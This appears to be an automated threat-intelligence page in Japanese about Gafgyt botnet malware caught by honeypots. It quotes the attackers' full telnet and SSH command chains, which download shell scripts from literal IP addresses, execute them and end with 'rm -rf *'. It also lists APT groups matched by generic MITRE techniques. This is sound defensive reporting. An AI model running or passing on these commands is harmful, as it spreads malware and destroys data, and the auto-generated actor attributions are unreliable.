Trusted Design

Linux/Gafgyt Malware

概要

Detected by honeypots Via telnet logins with weak passwords Commands: cd /tmp; wget http://23.94.47.60/gtop.sh || curl -O http://23.94.47.60/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 23.94.47.60 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 23.94.47.60; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh;exit /bin/busybox;echo -e &amp;amp;#39;\147\141\171\146\147\164&amp;amp;#39; Via SSH login: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://163.172.186.66/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 163.172.186.66 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 163.172.186.66; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 163.172.186.66 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

Honeypot, typical linux ddos botnet script (score: 0.63)
MMD-0047-2015 - SSHV: SSH bruter ELF botnet malware (score: 0.52)
Linux DDoS Malware delivered via SSH (score: 0.52)
attempted admin (score: 0.51)
ELF binaries on consumer-grade gateway routers - pnscan 2 (score: 0.51)

このPulseに関連する脅威アクター (事実ベース)

UNC3886

Score: 3.15

Matched TTPs:

T1027.005 - Indicator Removal from Tools

MITREへのリンク →

Patchwork

Score: 3.15

Matched TTPs:

T1027.005 - Indicator Removal from Tools

MITREへのリンク →

Deep Panda

Score: 3.15

Matched TTPs:

T1027.005 - Indicator Removal from Tools

MITREへのリンク →

GALLIUM

Score: 3.15

Matched TTPs:

T1027.005 - Indicator Removal from Tools

MITREへのリンク →

OilRig

Score: 4.34

Matched TTPs:

T1027.005 - Indicator Removal from Tools
T1071.001 - Web Protocols

MITREへのリンク →

Turla

Score: 4.34

Matched TTPs:

T1027.005 - Indicator Removal from Tools
T1071.001 - Web Protocols

MITREへのリンク →

APT3

Score: 3.15

Matched TTPs:

T1027.005 - Indicator Removal from Tools

MITREへのリンク →

APT29

Score: 4.54

Matched TTPs:

T1090.004 - Domain Fronting

MITREへのリンク →

Mustang Panda

Score: 5.32

Matched TTPs:

T1071.001 - Web Protocols
T1027.007 - Dynamic API Resolution

MITREへのリンク →

Lazarus Group

Score: 5.32

Matched TTPs:

T1071.001 - Web Protocols
T1027.007 - Dynamic API Resolution

MITREへのリンク →

Contagious Interview

Score: 4.54

Matched TTPs:

T1547.013 - XDG Autostart Entries

MITREへのリンク →

Axiom

Score: 4.54

Matched TTPs:

T1001.002 - Steganography

MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Lazarus Group

Score: 0.76

Matched TTPs:

T1071.001 - Web Protocols
T1027.007 - Dynamic API Resolution

MITREへのリンク →

Mustang Panda

Score: 0.75

Matched TTPs:

T1071.001 - Web Protocols
T1027.007 - Dynamic API Resolution

MITREへのリンク →

Contagious Interview

Score: 0.68

Matched TTPs:

T1547.013 - XDG Autostart Entries

MITREへのリンク →

Axiom

Score: 0.67

Matched TTPs:

T1001.002 - Steganography

MITREへのリンク →

Turla

Score: 0.66

Matched TTPs:

T1071.001 - Web Protocols
T1027.005 - Indicator Removal from Tools

MITREへのリンク →

APT29

Score: 0.65

Matched TTPs:

T1090.004 - Domain Fronting

MITREへのリンク →

OilRig

Score: 0.64

Matched TTPs:

T1071.001 - Web Protocols
T1027.005 - Indicator Removal from Tools

MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクターグラフ

← Pulse一覧に戻る